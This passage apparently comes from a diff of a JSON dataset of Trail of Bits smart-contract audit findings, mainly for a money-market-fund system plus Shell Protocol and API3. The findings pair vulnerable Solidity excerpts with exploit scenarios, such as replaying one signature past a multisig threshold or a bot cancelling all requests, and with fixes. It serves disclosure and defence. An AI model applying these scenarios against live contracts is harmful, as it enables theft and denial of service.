TransferAgentGateway contract checks that the caller is the owner or a shareholder. However, if the caller is not the owner, the caller is not matched against the account argument. This allows any shareholder to call the cancelRequest function in the TransactionalModule for any account and requestId . function cancelRequest ( address account , bytes32 requestId , string calldata memo ) external override { require ( msg.sender == owner() || IAuthorization( moduleRegistry.getModuleAddress(AUTHORIZATION_MODULE) ).isAccountAuthorized( msg.sender ), \"OPERATION_NOT_ALLOWED_FOR_CALLER\" ); ICancellableTransaction( moduleRegistry.getModuleAddress(TRANSACTIONAL_MODULE) ).cancelRequest(account, requestId, memo); } Figure 1.1: The cancelRequest function in the TransferAgentGateway contract As shown in gure 1.2, the if condition in the cancelRequest function in the TransactionalModule contract implements a check that does not allow shareholders to cancel transaction requests created by the admin. However, this check passes because the TransferAgentGateway contract is set up as the admin account in the authorization module. function cancelRequest ( address account , bytes32 requestId , string calldata memo ) external override onlyAdmin onlyShareholder(account) { require ( transactionDetailMap[requestId].txType > ITransactionStorage.TransactionType.INVALID, \"INVALID_TRANSACTION_ID\" ); if (!transactionDetailMap[requestId].selfService) { require ( IAuthorization(modules.getModuleAddress(AUTHORIZATION_MODULE)) .isAdminAccount( msg.sender ), \"CALLER_IS_NOT_AN_ADMIN\" ); } require ( pendingTransactionsMap[account].remove(requestId), \"INVALID_TRANSACTION_ID\" ); delete transactionDetailMap[requestId]; accountsWithTransactions.remove(account); emit TransactionCancelled(account, requestId, memo); } Figure 1.2: The cancelRequest function in the TransactionalModule contract Thus, a shareholder can cancel any transaction request created by anyone. Exploit Scenario Eve becomes an authorized shareholder and sets up a bot to listen to the TransactionSubmitted event on the TransactionalModule contract. The bot calls the cancelRequest function on the TransferAgentGateway contract for every event and cancels all the transaction requests before they are settled, thus executing a DoS attack on the MMF system. Recommendations Short term, add a check in the TransferAgentGateway contract to allow shareholders to cancel requests only for their own accounts. Long term, document access control rules in a publicly accessible location. These rules should encompass admin, non-admin, and common functions. Ensure the code adheres to that specication by extending unit test coverage for positive and negative expectations within the system. Add fuzz tests where access control rules are the invariants under test.", "labels": [ "Trail of Bits", "Severity: High", - "Difficulty: Medium" + "Difficulty: Low" ] }, { - "title": "4. Project dependencies contain vulnerabilities ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", - "body": "Although dependency scans did not identify a direct threat to the project under review, npm and yarn audit identied dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure that dependencies are not malicious. Problems with dependencies in the JavaScript community could have a signicant eect on the repository under review. The output below details these issues: CVE ID", + "title": "2. Lack of validation in the IntentValidationModule contract can lead to inconsistent state ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "Lack of validation in the state-modifying functions of the IntentValidationModule contract can cause users to be locked out of the system. As shown in gure 2.1, the setDeviceKey function in IntentValidationModule allows adding a device ID and key to multiple accounts, which may result in the unauthorized use of a device ID. function setDeviceKey ( address account , uint256 deviceId , string memory key ) external override onlyAdmin { devicesMap[account].add(deviceId); deviceKeyMap[deviceId] = key; emit DeviceKeyAdded(account, deviceId); } Figure 2.1: The setDeviceKey functions in the IntentValidationModule contract Additionally, a lack of validation in the clearDeviceKey and clearAccountKeys functions can cause the key for a device ID to become zero, which may prevent users from authenticating their requests. function clearDeviceKey ( address account , uint256 deviceId ) external override onlyAdmin { _removeDeviceKey(account, deviceId); } function clearAccountKeys ( address account ) external override onlyAdmin { uint256 [] memory devices = devicesMap[account].values(); for ( uint i = 0 ; i < devices.length; ) { _removeDeviceKey(account, devices[i]); unchecked { i++; } } } Figure 2.2: Functions to clear device ID and key in the IntentValidationModule contract The account-todevice ID mapping and device IDto-key mapping are used to authenticate user actions in an o-chain component, which can malfunction in the presence of these inconsistent states and lead to the authentication of malicious user actions. Exploit Scenario An admin adds the DEV_A device and the KEY_K key to Bob. Then there are multiple scenarios to cause an inconsistent state, such as the following: Adding one device to multiple accounts: 1. An admin adds the DEV_A device and the KEY_K key to Alice by mistake. 2. Alice can use Bobs device to send unauthorized requests. Overwriting a key for a device ID: 1. An admin adds the DEV_A device and the KEY_L key to Alice, which overwrites the key for the DEV_A device from KEY_K to KEY_L . 2. Bob cannot authenticate his requests with his KEY_K key. Setting a key to zero for a device ID: 1. An admin adds the DEV_A device and the KEY_K key to Alice by mistake. 2. An admin removes the DEV_A device from Alices account. This sets the key for the DEV_A device to zero, which is still added to Bobs account. 3. Bob cannot authenticate his requests with his KEY_K key. Recommendations Short term, make the following changes: Add a check in the setDeviceKey function to ensure that a device is not added to multiple accounts. Add a new function to update the key of an already added device with correct validation checks for the update. Long term, document valid system states and the state transitions allowed from each state. Ensure proper data validation checks are added in all state-modifying functions with unit and fuzzing tests.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: High", + "Difficulty: High" ] }, { - "title": "5. Use of duplicate functions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", - "body": "The ProteusLogic and Proteus contracts both contain a function used to update the internal slices array. Although calls to these functions currently lead to identical outcomes, there is a risk that a future update could be applied to one function but not the other, which would be problematic. < function _updateSlices(int128[] memory slopes, int128[] memory rootPrices) internal { < require(slopes.length == rootPrices.length); < require(slopes.length > 1); --- > function _updateSlices(int128[] memory slopes, int128[] memory rootPrices) > internal > { > if (slopes.length != rootPrices.length) { > revert UnequalArrayLengths(); > } > if (slopes.length < 2) { > revert TooFewParameters(); > } Figure 5.1: The di between the ProteusLogic and Proteus contracts _updateSlices() functions Using duplicate functions in dierent contracts is not best practice. It increases the risk of a divergence between the contracts and could signicantly aect the system properties. Dening a function in one contract and having other contracts call that function is less risky. Exploit Scenario Alice, a developer of the Shell Protocol, is tasked with updating the ProteusLogic contract. The update requires a change to the Proteus._updateSlices function. However, Alice forgets to update the ProteusLogic._updateSlices function. Because of this omission, the functions updates to the internal slices array may produce dierent results. Recommendations Short term, select one of the two _updateSlices functions to retain in the codebase and to maintain going forward. Long term, consider consolidating the Proteus and ProteusLogic contracts into a single implementation, and avoid duplicating logic.", + "title": "3. Pending transactions cannot be settled ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "An account removed from the accountsWithTransactions state variable will have its pending transactions stuck in the system, resulting in an opportunity cost loss for the users. The accountsWithTransactions state variable in the TransactionalModule contract is used to keep track of accounts with pending transactions. It is used in the following functions: The getAccountsWithTransactions function to return the list of accounts with pending transactions The hasTransactions function to check if an account has pending transactions. However, the cancelRequest function in the TransactionalModule contract removes the account from the accountsWithTransactions list for every cancellation. If an account has multiple pending transactions, canceling only one of the transaction requests will remove the account from the accountsWithTransactions list. function cancelRequest ( address account , bytes32 requestId , string calldata memo ) external override onlyAdmin onlyShareholder(account) { require ( transactionDetailMap[requestId].txType > ITransactionStorage.TransactionType.INVALID, \"INVALID_TRANSACTION_ID\" ); if (!transactionDetailMap[requestId].selfService) { require ( IAuthorization(modules.getModuleAddress(AUTHORIZATION_MODULE)) .isAdminAccount( msg.sender ), \"CALLER_IS_NOT_AN_ADMIN\" ); } require ( pendingTransactionsMap[account].remove(requestId), \"INVALID_TRANSACTION_ID\" ); delete transactionDetailMap[requestId]; accountsWithTransactions.remove(account); emit TransactionCancelled(account, requestId, memo); } Figure 3.1: The cancelRequest function in the TransactionalModule contract In gure 3.1, the account has pending transactions, but it is not present in the accountsWithTransactions list. The o-chain components and other functionality relying on the getAccountsWithTransactions and hasTransactions functions will see these accounts as not having any pending transactions. This may result in non-settlement of the pending transactions for these accounts, leading to a loss for the users. Exploit Scenario Alice, a shareholder, creates multiple transaction requests and cancels the last request. For the next settlement process, the o-chain component calls the getAccountsWithTransactions function to get the list of accounts with pending transactions and settles these accounts. After the settlement run, Alice checks her balance and is surprised that her transaction requests are not settled. She loses prots from upcoming market movements. Recommendations Short term, have the code use the unlistFromAccountsWithPendingTransactions function in the cancelRequest function to update the accountsWithTransactions list. Long term, document the system state machine specication and follow it to ensure proper data validation checks are added in all state-modifying functions.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "6. Certain identity curve congurations can lead to a loss of pool tokens ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", - "body": "A rounding error in an integer division operation could lead to a loss of pool tokens and the dilution of liquidity provider (LP) tokens. We reimplemented certain of Cowri Labss fuzz tests and used Echidna to test the system properties specied in the Automated Testing section. The original fuzz testing used a xed amount of 100 tokens for the initial xBalance and yBalance values; after we removed that limitation, Echidna was able to break some of the invariants. The Shell Protocol team should identify the largest possible percentage decrease in pool utility or utility per shell (UPS) to better quantify the impact of a broken invariant on system behavior. In some of the breaking cases, the ratio of token balances, m, was close to the X or Y asymptote of the identity curve. This means that an attacker might be able to disturb the balance of the pool (through ash minting or a large swap, for example) and then exploit the broken invariants. Exploit Scenario Alice withdraws USD 100 worth of token X from a Proteus-based liquidity pool by burning her LP tokens. She eventually decides to reenter the pool and to provide the same amount of liquidity. Even though the curves conguration is similar to the conguration at the time of her withdrawal, her deposit leads to only a USD 90 increase in the pools balance of token X; thus, Alice receives fewer LP tokens than she should in return, eectively losing money because of an arithmetic error. Recommendations Short term, investigate the root cause of the failing properties. Document and test the expected rounding direction (up or down) of each arithmetic operation, and ensure that the rounding direction used in each operation benets the pool. Long term, implement the fuzz testing recommendations outlined in appendix C.", + "title": "4. Deauthorized accounts can keep shares of the MMF ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "An unauthorized account can keep shares if the admin deauthorizes the shareholder without zeroing their balance. This can lead to legal issues because unauthorized users can keep shares of the MMF. The deauthorizeAccount function in the AuthorizationModule contract does not check that the balance of the provided account is zero before revoking the ROLE_FUND_AUTHORIZED role: function deauthorizeAccount ( address account ) external override onlyRole(ROLE_AUTHORIZATION_ADMIN) { require (account != address ( 0 ), \"INVALID_ADDRESS\" ); address txModule = modules.getModuleAddress( keccak256 ( \"MODULE_TRANSACTIONAL\" ) ); require (txModule != address ( 0 ), \"MODULE_REQUIRED_NOT_FOUND\" ); require ( hasRole(ROLE_FUND_AUTHORIZED, account), \"SHAREHOLDER_DOES_NOT_EXISTS\" ); require ( !ITransactionStorage(txModule).hasTransactions(account), \"PENDING_TRANSACTIONS_EXIST\" ); _revokeRole(ROLE_FUND_AUTHORIZED, account); emit AccountDeauthorized(account); } Figure 4.1: The deauthorizeAccount function in the AuthorizationModule contract If an admin account deauthorizes a shareholder account without making the balance zero, the unauthorized account will keep the shares of the MMF. The impact is limited, however, because the unauthorized account will not be able to liquidate the shares. The admin can also adjust the balance of the account to make it zero. However, if the admin forgets to adjust the balance or is unable to adjust the balance, it can lead to an unauthorized account holding shares of the MMF. Recommendations Short term, add a check in the deauthorizeAccount function to ensure that the balance of the provided account is zero. Long term, document the system state machine specication and follow it to ensure proper data validation checks are added in all state-modifying functions. Add fuzz tests where the rules enforced by those validation checks are the invariants under test.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Undetermined" + "Severity: Medium", + "Difficulty: High" ] }, { - "title": "7. Lack of events for critical operations ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", - "body": "Two critical operations do not trigger events. As a result, it will be dicult to review the correct behavior of the contracts once they have been deployed. The LiquidityPoolProxy contracts setImplementation function is called to set the implementation address of the liquidity pool and does not emit an event providing conrmation of that operation to the contracts caller (gure 7.1). function setImplementation(address _implementation) external onlyOwner { } implementation = ILiquidityPoolImplementation(_implementation); Figure 7.1: The setImplementation() function in LiquidityPoolProxy.sol#L2833 Calls to the updateSlices function in the Proteus contract do not trigger events either (gure 7.2). This is problematic because updates to the slices array have a signicant eect on the conguration of the identity curve (TOB-SHELL-1). function updateSlices(int128[] memory slopes, int128[] memory rootPrices) external onlyOwner { } _updateSlices(slopes, rootPrices); Figure 7.2: The updateSlices() function in Proteus.sol#L623628 Without events, users and blockchain-monitoring systems cannot easily detect suspicious behavior. Exploit Scenario Eve, an attacker, is able to take ownership of the LiquidityPoolProxy contract. She then sets a new implementation address. Alice, a Shell Protocol team member, is unaware of the change and does not raise a security incident. Recommendations Short term, add events for all critical operations that result in state changes. Events aid in contract monitoring and the detection of suspicious behavior. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components.", + "title": "5. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "The MMF has enabled optional compiler optimizations in Solidity. According to a November 2018 audit of the Solidity compiler , the optional optimizations may not be safe . optimizer: { enabled: true , runs: 200 , }, Figure 5.1: Hardhat optimizer enabled in hardhat.config.js Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild use them. Therefore, it is unclear how well they are being tested and exercised. Moreover, optimizations are actively being developed . High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten -generated solc-js compiler used by True and Remix persisted until late 2018; the x for this bug was not reported in the Solidity changelog. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of Keccak-256 was reported. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-js causes a security vulnerability in the MMF contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: Low" ] }, { - "title": "8. Ocean may accept unexpected airdrops ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", - "body": "Unexpected transfers of tokens to the Ocean contract may break its internal accounting, essentially leading to the loss of the transferred asset. To mitigate this risk, Ocean attempts to reject airdrops. Per the ERC721 and ERC1155 standards, contracts must implement specic methods to accept or deny token transfers. To do this, the Ocean contract uses the onERC721Received and onERC1155Received callbacks and _ERC1155InteractionStatus and _ERC721InteractionStatus storage ags. These storage ags are enabled in ERC721 and ERC1155 wrapping operations to facilitate successful standard-compliant transfers. However, the _erc721Unwrap and _erc1155Unwrap functions also enable the _ERC721InteractionStatus and _ERC1155InteractionStatus ags, respectively. Enabling these ags allows for airdrops, since the Ocean contract, not the user, is the recipient of the tokens in unwrapping operations. function _erc721Unwrap( address tokenAddress, uint256 tokenId, address userAddress, uint256 oceanId ) private { _ERC721InteractionStatus = INTERACTION; IERC721(tokenAddress).safeTransferFrom( address(this), userAddress, tokenId ); _ERC721InteractionStatus = NOT_INTERACTION; emit Erc721Unwrap(tokenAddress, tokenId, userAddress, oceanId); } Figure 8.1: The _erc721Unwrap() function in Ocean.sol#L1020- Exploit Scenario Alice calls the _erc721Unwrap function. When the onERC721Received callback function in Alices contract is called, Alice mistakenly sends the ERC721 tokens back to the Ocean contract. As a result, her ERC721 is permanently locked in the contract and eectively burned. Recommendations Short term, disallow airdrops of standard-compliant tokens during unwrapping interactions and document the edge cases in which the Ocean contract will be unable to stop token airdrops. Long term, when the Ocean contract is expecting a specic airdrop, consider storing the originating address of the transfer and the token type alongside the relevant interaction ag.", + "title": "6. Project dependencies contain vulnerabilities ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "Although dependency scans did not identify a direct threat to the project codebase, npm audit found dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure dependencies are not malicious. Problems with dependencies in the JavaScript community could have a signicant eect on the MMF system. The output detailing the identied issues has been included below: Dependency Version ID", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Undetermined", "Difficulty: High" ] }, { - "title": "1. Publish-subscribe protocol users are vulnerable to a denial of service ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "The API3 system implements a publish-subscribe protocol through which a requester can receive a callback from an API when specied conditions are met. These conditions can be hard-coded when the Airnode is congured or stored on-chain. When they are stored on-chain, the user can call storeSubscription to establish other conditions for the callback (by specifying parameters and conditions arguments of type bytes ). The arguments are then used in abi.encodePacked , which could result in a subscriptionId collision. function storeSubscription( [...] bytes calldata parameters, bytes calldata conditions, [...] ) external override returns ( bytes32 subscriptionId) { [...] subscriptionId = keccak256 ( abi .encodePacked( chainId, airnode, templateId, parameters , conditions , relayer, sponsor, requester, fulfillFunctionId ) ); subscriptions[subscriptionId] = Subscription({ chainId: chainId, airnode: airnode, templateId: templateId, parameters: parameters, conditions: conditions, relayer: relayer, sponsor: sponsor, requester: requester, fulfillFunctionId: fulfillFunctionId }); Figure 1.1: StorageUtils.sol#L135-L158 The Solidity documentation includes the following warning: If you use keccak256(abi.encodePacked(a, b)) and both a and b are dynamic types, it is easy to craft collisions in the hash value by moving parts of a into b and vice-versa. More specically, abi.encodePacked(\"a\", \"bc\") == abi.encodePacked(\"ab\", \"c\"). If you use abi.encodePacked for signatures, authentication or data integrity, make sure to always use the same types and check that at most one of them is dynamic. Unless there is a compelling reason, abi.encode should be preferred. Figure 1.2: The Solidity documentation details the risk of a collision caused by the use of abi.encodePacked with more than one dynamic type. Exploit Scenario Alice calls storeSubscription to set the conditions for a callback from a specic API to her smart contract. Eve, the owner of a competitor protocol, calls storeSubscription with the same arguments as Alice but moves the last byte of the parameters argument to the beginning of the conditions argument. As a result, the Airnode will no longer report API results to Alices smart contract. Recommendations Short term, use abi.encode instead of abi.encodePacked . Long term, carefully review the Solidity documentation , particularly the Warning sections regarding the pitfalls of abi.encodePacked .", + "title": "7. Unimplemented getVersion function returns default value of zero ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "The getVersion function within the TransferAgentModule contract is not implemented; at present, it yields the default uint8 value of zero. function getVersion() external pure virtual override returns ( uint8 ) {} Figure 7.1: Unimplemented getVersion function in the TransferAgentModule contract The other module contracts establish a pattern where the getVersion function is supposed to return a value of one. function getVersion() external pure virtual override returns ( uint8 ) { return 1; } Figure 7.2: Implemented getVersion function in the TransactionalModule contract Exploit Scenario Alice calls the getVersion function on the TransferAgentModule contract. It returns zero, and all the other module contracts return one. Alice misunderstands the system and which contracts are on what version of their lifecycle. Recommendations Short term, implement the getVersion function in the TransferAgentModule contract so it matches the specication established in the other modules. Long term, use the Slither static analyzer to catch common issues such as this one. Implement slither-action into the projects CI pipeline.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "2. Solidity compiler optimizations can be problematic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "The API3 contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten -generated solc-js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-js causes a security vulnerability in the API3 contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "title": "8. The MultiSigGenVerier threshold can be passed with a single signature ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "A single signature can be used multiple times to pass the threshold in the MultiSigGenVerifier contract, allowing a single signer to take full control of the system. The signedDataExecution function in the MultiSigGenVerifier contract veries provided signatures and accumulates the acquiredThreshold value in a loop as shown in gure 8.1: for ( uint256 i = 0 ; i < signaturesCount; i++) { (v, r, s) = _splitSignature(signatures, i); address signerRecovered = ecrecover( hash , v, r, s); if (signersSet.contains(signerRecovered)) { acquiredThreshold += signersMap[signerRecovered]; } } Figure 8.1: The signer recovery section of the signedDataExecution function in the MultiSigGenVerifier contract This code checks whether the recovered signer address is one of the previously added signers and adds the signers weight to acquiredThreshold . However, the code does not check that all the recorded signers are unique, which allows the submitter to pass the threshold with only a single signature to execute the signed transaction. The current function has an implicit zero-address check in the subsequent if statementto add new signers, they must not be address(0) . If this logic changes in the future, the impact of the ecrecover function returning address(0) (which happens when a signature is malformed) must be carefully reviewed. Exploit Scenario Eve, a signer, colludes with a submitter to settle their transactions at a favorable date and price. Eve signs the transaction and provides it to the submitter. The submitter uses this signature to call the signedDataExecution function by repeating the same signature multiple times in the signatures argument array to pass the threshold. Using this method, Eve can execute any admin transaction without consent from other admins. Recommendations Short term, have the code verify that the signatures provided to the signedDataExecution function are unique. One way of doing this is to sort the signatures in increasing order of the signer addresses and verify this order in the loop. An example of this order verication code is shown in gure 8.2: address lastSigner = address(0); for ( uint256 i = 0 ; i < signaturesCount; i++) { (v, r, s) = _splitSignature(signatures, i); address signerRecovered = ecrecover( hash , v, r, s); require (lastSigner < signerRecovered); lastSigner = signerRecovered; if (signersSet.contains(signerRecovered)) { acquiredThreshold += signersMap[signerRecovered]; } } Figure 8.2: An example code to verify uniqueness of the provided signatures Long term, expand unit test coverage to account for common edge cases, and carefully consider all possible values for any user-provided inputs. Implement fuzz testing to explore complex scenarios and nd dicult-to-detect bugs in functions with user-provided inputs.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: N/A" + "Severity: High", + "Difficulty: Medium" ] }, { - "title": "3. Decisions to opt out of a monetization scheme are irreversible ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "The API3 protocol implements two on-chain monetization schemes. If an Airnode owner decides to opt out of a scheme, the Airnode will not receive additional token payments or deposits (depending on the scheme). Although the documentation states that Airnodes can opt back in to a scheme, the current implementation does not allow it. /// @notice If the Airnode is participating in the scheme implemented by /// the contract: /// Inactive: The Airnode is not participating, but can be made to /// participate by a mantainer /// Active: The Airnode is participating /// OptedOut: The Airnode actively opted out, and cannot be made to /// participate unless this is reverted by the Airnode mapping(address => AirnodeParticipationStatus) public override airnodeToParticipationStatus; Figure 3.1: RequesterAuthorizerWhitelisterWithToken.sol#L59-L68 /// @notice Sets Airnode participation status /// @param airnode Airnode address /// @param airnodeParticipationStatus Airnode participation status function setAirnodeParticipationStatus( address airnode, AirnodeParticipationStatus airnodeParticipationStatus ) external override onlyNonZeroAirnode(airnode) { if (msg.sender == airnode) { require( airnodeParticipationStatus == AirnodeParticipationStatus.OptedOut, \"Airnode can only opt out\" ); } else { [...] Figure 3.2: RequesterAuthorizerWhitelisterWithToken.sol#L229-L242 Exploit Scenario Bob, an Airnode owner, decides to temporarily opt out of a scheme, believing that he will be able to opt back in; however, he later learns that that is not possible and that his Airnode will be unable to accept any new requesters. Recommendations Short term, adjust the setAirnodeParticipationStatus function to allow Airnodes that have opted out of a scheme to opt back in. Long term, write extensive unit tests that cover all of the expected pre- and postconditions. Unit tests could have uncovered this issue.", + "title": "9. Shareholders can renounce their authorization role ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "Shareholders can renounce their authorization role. As a result, system contracts that check for authorization and o-chain components may not work as expected because of an inconsistent system state. The AuthorizationModule contract extends the AccessControlUpgradeable contract from the OpenZeppelin library. The AccessControlUpgradeable contract has a public renounceRole function, which can be called by anyone to revoke a role on their own account. function renounceRole ( bytes32 role , address account ) public virtual override { require (account == _msgSender(), \"AccessControl: can only renounce roles for self\" ); _revokeRole(role, account); } Figure 9.1: The renounceRole function of the base contract from the OpenZeppelin library Any shareholder can use the renounceRole function to revoke the ROLE_FUND_AUTHORIZED role on their own account without authorization from the admin. This role is used in three functions in the AccessControlUpgradeable contract: 1. The isAccountAuthorized function to check if an account is authorized 2. The getAuthorizedAccountsCount to get the number of authorized accounts 3. The getAuthorizedAccountAt to get the authorized account at an index Other contracts and o-chain components relying on these functions may nd the system in an inconsistent state and may not be able to work as expected. Exploit Scenario Eve, an authorized shareholder, renounces her ROLE_FUND_AUTHORIZED role. The o-chain components fetch the number of authorized accounts, which is one less than the expected value. The o-chain component is now operating on an inaccurate contract state. Recommendations Short term, have the code override the renounceRole function in the AuthorizationModule contract. Make this overridden function an admin-only function. Long term, read all the library code to nd public functions exposed by the base contracts and override them to implement correct business logic and enforce proper access controls. Document any changes between the original OpenZeppelin implementation and the MMF implementation. Be sure to thoroughly test overridden functions and changes in unit tests and fuzz tests.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Low", "Difficulty: Low" ] }, { - "title": "4. Depositors can front-run request-blocking transactions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "A depositor can front-run a request-blocking transaction and withdraw his or her deposit. The RequesterAuthorizerWhitelisterWithTokenDeposit contract enables a user to indenitely whitelist a requester by depositing tokens on behalf of the requester. A manager or an address with the blocker role can call setRequesterBlockStatus or setRequesterBlockStatusForAirnode with the address of a requester to block that user from submitting requests; as a result, any user who deposited tokens to whitelist the requester will be blocked from withdrawing the deposit. However, because one can execute a withdrawal immediately, a depositor could monitor the transactions and call withdrawTokens to front-run a blocking transaction. Exploit Scenario Eve deposits tokens to whitelist a requester. Because the requester then uses the system maliciously, the manager blacklists the requester, believing that the deposited tokens will be seized. However, Eve front-runs the transaction and withdraws the tokens. Recommendations Short term, implement a two-step withdrawal process in which a depositor has to express his or her intention to withdraw a deposit and the funds are then unlocked after a waiting period. Long term, analyze all possible front-running risks in the system.", + "title": "10. Risk of multiple dividend payouts in a day ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "The fund manager can lose the systems money by making multiple dividend payouts in a day when they should be paid out only once a day. The distributeDividends function in the MoneyMarketFund contract takes the date as an argument. This date value is not validated to be later than the date from an earlier execution of the distributeDividends function. function distributeDividends ( address [] calldata accounts, uint256 date , int256 rate , uint256 price ) { } external onlyAdmin onlyWithValidRate(rate) onlyValidPaginationSize(accounts.length, MAX_ACCOUNT_PAGE_SIZE) lastKnownPrice = price; for ( uint i = 0 ; i < accounts.length; ) { _processDividends(accounts[i], date, rate, price); unchecked { i++; } } Figure 10.1: The distributeDividends function in the MoneyMarketFund contract As a result, the admin can distribute dividends multiple times a day, which will result in the loss of funds from the company to the users. The admin can correct this mistake by using the adjustBalance function, but adjusting the balance for all the system users will be a dicult and costly process. The same issue also aects the following three functions: 1. The endOfDay function in the MoneyMarketFund contract 2. The distributeDividends function in the TransferAgentModule contract 3. The endOfDay function in the TransferAgentModule contract. Exploit Scenario The admin sends a transaction to distribute dividends. The transaction is not included in the blockchain because of congestion or gas estimation errors. Forgetting about the earlier transaction, the admin sends another transaction, and both transactions are executed to distribute dividends on the same day. Recommendations Short term, have the code store the last dividend distribution date and validate that the date argument in all the dividend distribution functions is later than the last stored dividend date. Long term, document the system state machine specication and follow it to ensure proper data validation checks are added to all state-modifying functions.", "labels": [ "Trail of Bits", "Severity: Medium", @@ -4242,39 +6930,29 @@ ] }, { - "title": "5. Incompatibility with non-standard ERC20 tokens ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "The RequesterAuthorizerWhitelisterWithTokenPayment and RequesterAuthorizerWhitelisterWithTokenDeposit contracts are meant to work with any ERC20 token. However, several high-prole ERC20 tokens do not correctly implement the ERC20 standard. These include USDT, BNB, and OMG, all of which have a large market cap. The ERC20 standard denes two transfer functions, among others: transfer(address _to, uint256 _value) public returns (bool success) transferFrom(address _from, address _to, uint256 _value) public returns (bool success) These high-prole ERC20 tokens do not return a boolean when at least one of the two functions is executed. As of Solidity 0.4.22, the size of return data from external calls is checked. As a result, any call to the transfer or transferFrom function of an ERC20 token with an incorrect return value will fail. Exploit Scenario Bob deploys the RequesterAuthorizerWhitelisterWithTokenPayment contract with USDT as the token. Alice wants to pay for a requester to be whitelisted and calls payTokens , but the transferFrom call fails. As a result, the contract is unusable. Recommendations Short term, consider using the OpenZeppelin SafeERC20 library or adding explicit support for ERC20 tokens with incorrect return values. Long term, adhere to the token integration best practices outlined in appendix C .", - "labels": [ - "Trail of Bits", - "Severity: Informational", - "Difficulty: N/A" - ] - }, - { - "title": "6. Compromise of a single oracle enables limited control of the dAPI value ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "By compromising only one oracle, an attacker could gain control of the median price of a dAPI and set it to a value within a certain range. The dAPI value is the median of all values provided by the oracles. If the number of oracles is odd (i.e., the median is the value in the center of the ordered list of values), an attacker could skew the median, setting it to a value between the lowest and highest values submitted by the oracles. Exploit Scenario There are three available oracles: O 0 , with a price of 603; O 1 , with a price of 598; and O 2 , which has been compromised by Eve. Eve is able to set the median price to any value in the range [598 , 603] . Eve can then turn a prot by adjusting the rate when buying and selling assets. Recommendations Short term, be mindful of the fact that there is no simple x for this issue; regardless, we recommend implementing o-chain monitoring of the DapiServer contracts to detect any suspicious activity. Long term, assume that an attacker may be able to compromise some of the oracles. To mitigate a partial compromise, ensure that dAPI value computations are robust.", + "title": "11. Shareholders can stop admin from deauthorizing them ", + "html_url": 